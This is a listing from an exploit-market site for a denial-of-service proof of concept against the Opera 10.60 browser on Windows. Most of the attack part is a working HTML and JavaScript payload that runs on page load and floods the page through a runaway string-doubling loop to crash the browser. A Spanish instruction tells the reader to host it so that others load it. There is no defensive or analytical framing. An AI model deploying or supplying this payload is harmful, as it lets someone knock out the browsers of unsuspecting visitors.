[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Opera Exploit v10.60 Denial of Service

Author
PoisonCode
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13182
Category
dos / poc
Date add
06-07-2010
Platform
windows
======================================
Opera Exploit v10.60 Denial of Service
======================================


# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title:OperaRemote Dos
# Software Link:http://www.opera.com
# Version: v10.60
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()

_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/


Lo Guardamos como un html y lo subimos algun host

Exploit
-----------------------------------------

<body onload="javascript:Dos();"></body>

<script>

function Dos() {

var b = '\x00\x13\xE8\x7C\x00\x13\xE8\90\x00\x13\xEC\0C';
for (a =0;a<99999999999;a++) {
b+=b+'\x00\x13\xE8\x7C\x00\x13\xE8\90\x00\x13\xEC\0C';
document.write('<html><marquee><h1>'+b+b);

}

}

</script>



#  0day.today [2024-07-05]  #